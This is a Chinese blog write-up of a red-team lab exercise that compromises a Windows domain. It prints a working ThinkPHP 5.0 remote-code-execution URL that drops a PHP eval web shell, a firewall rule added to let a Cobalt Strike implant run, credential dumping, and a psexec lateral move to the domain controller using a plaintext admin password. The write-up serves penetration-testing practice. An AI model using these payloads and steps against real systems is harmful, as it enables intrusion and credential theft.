~Welcome to My Blog~

红队靶机五练习

发表于 更新于 分类于
4.3k 8 分钟

靶机信息:

1
2
3
4
5
6
7
攻击机 kali
ip:192.168.0.153
靶机 web服务器
网卡1:192.168.0.162
网卡2:192.168.138.136
靶机:域控
ip:192.168.138.138

相对于红队靶机一感觉简单了许多,可能是套路一样做了一遍的原因

前渗透
1
netdiscover -r 192.168.0.0/24  //探测存活主机

192.168.0.162便是我们把靶机ip

1
nmap -A -sV -sT 192.168.0.162 //对目标靶机进行端口扫描查看开启的服务
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-27 21:31 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.0.162
Host is up (0.0098s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: SUN)
3306/tcp  open  mysql        MySQL (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:B9:F4:45 (VMware)
Device type: general purpose|media device
Running: Microsoft Windows 2008|10|7|8.1, Microsoft embedded
OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_10 cpe:/h:microsoft:xbox_one cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Server 2008 SP2, Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN7, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:b9:f4:45 (VMware)
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: win7
|   NetBIOS computer name: WIN7\x00
|   Domain name: sun.com
|   Forest name: sun.com
|   FQDN: win7.sun.com
|_  System time: 2021-12-27T21:32:33+08:00
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-12-27T13:32:33
|_  start_date: 2021-12-24T10:19:01

TRACEROUTE
HOP RTT     ADDRESS
1   9.84 ms 192.168.0.162

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.16 seconds

3306一般是mysql数据库对应的服务端口

尝试远程连接一下

1
mysql -h192.168.0.162 -uroot -p

但是目标靶机数据库貌似禁用了远程连接

上面看到目标靶机还开放了80端口http服务,通过浏览器访问一下.

是一个thinkphp框架,通过报错查看对应的版本.

发现是ThinkPHP V5.0.22

网上有很多poc随便找一个尝试利用 ThinkPhp5.0任意代码执行:https://www.cnblogs.com/backlion/p/10106676.html

payload

1
ttp://192.168.0.162/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^>>shell.php

通过蚁剑尝试连接

连接成功

通过蚁剑的虚拟终端查看当前权限

1
whoami

直接是管理员权限.

1
ipconfig /all 查看是否有域

发现存在名字为sun的域

1
tasklist //查看是否有杀毒软件

发现并没有杀毒软件

这里准备cs生成一个木马把靶机上线到cs进行后渗透

后渗透
1
./teamserver 192.168.0.153 123456 //开启cs服务器

客户端进行连接

开启一个监听并生成木马muma.exe

通过蚁剑上传到靶机对应的目录中

1
netsh advfirewall firewall add rule name="muma.exe" dir=in action=allow program="C:\phpStudy\WWW\muma.exe" enable=yes //设置防火墙默认允许

运行木马

1
muma.exe

上线成功

1
beacon> shell net time /domain //查看域控

通过ping域控名字查看其IP地址

1
2
3
4
5
6
beacon> shell ping DC.sun.com
[*] Tasked beacon to run: ping DC.sun.com
[+] host called home, sent: 106 bytes
[+] received output:

正在 Ping DC.sun.com [192.168.138.138] 具有 32 字节的数据:
1
beacon> net view //查看域内主机
1
2
beacon> hashdump
beacon> logonpasswords //查看计算机内的用户密码

得到了目标的密码,直接通过cs中psexec模块进行票据传递攻击

先开启一个SMB服务的监听

对域控进行psexec攻击

同样也可以通过命令行进行传递攻击

1
2
3
4
5
6
7
8
9
10
11
beacon> rev2self
beacon> make_token SUN\Administrator hongrisec@2019
beacon> jump psexec DC 域控
[+] host called home, sent: 58 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_2835) on DC via Service Control Manager (\\DC\ADMIN$\79a9e06.exe)
[+] host called home, sent: 285790 bytes
[+] received output:
Started service 79a9e06 on DC
[+] host called home, sent: 74 bytes
[+] established link to child beacon: 192.168.138.138

最后域控也成功上线

成功通关!